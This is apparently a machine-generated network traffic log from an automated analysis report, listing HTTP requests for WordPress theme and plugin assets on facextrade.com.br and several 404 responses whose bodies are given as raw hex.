Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/pt-br.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquery.flexslider-min.js?ver=2.2.2 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/images/content_bg4.jpg HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/switcher.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/arrow_down.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-plugin/includes/js/cherry-plugin.js?ver=1.2.8.1 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.mousewheel.min.js?ver=3.0.6 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/jquery.simplr.smoothscroll.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/cherry-parallax/js/cherry.parallax.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/custom-script.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/chart.min.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/theme51253/js/scrollShowTime.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/tmstickup.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-embed.min.js?ver=4.9.20 HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /wp-content/themes/CherryFramework/images/up-arrow.png HTTP/1.1Accept: */*Referer: http://facextrade.com.br/wp-includes/certificates/4.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: facextrade.com.brConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 08:48:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 08:48:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 08:48:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 46 61 63 65 78 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 26 72 61 71 75 6f 3b 20 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 46 61 63 65 78 20 43 6f 6d c3 a9 72 63 69 6f 20 45 78 74 65 72 69 6f 72 20 4c 74 64 61 2e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Aug 2022 08:48:50 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://facextrade.com.br/wp-json/>; rel="https://api.w.org/"Content-Type: text/html; charset=UTF-8X-Varnish: 22495278Age: 0Via: 1.1 varnish-v4Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 30 30 31 30 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 36 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 39 22 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 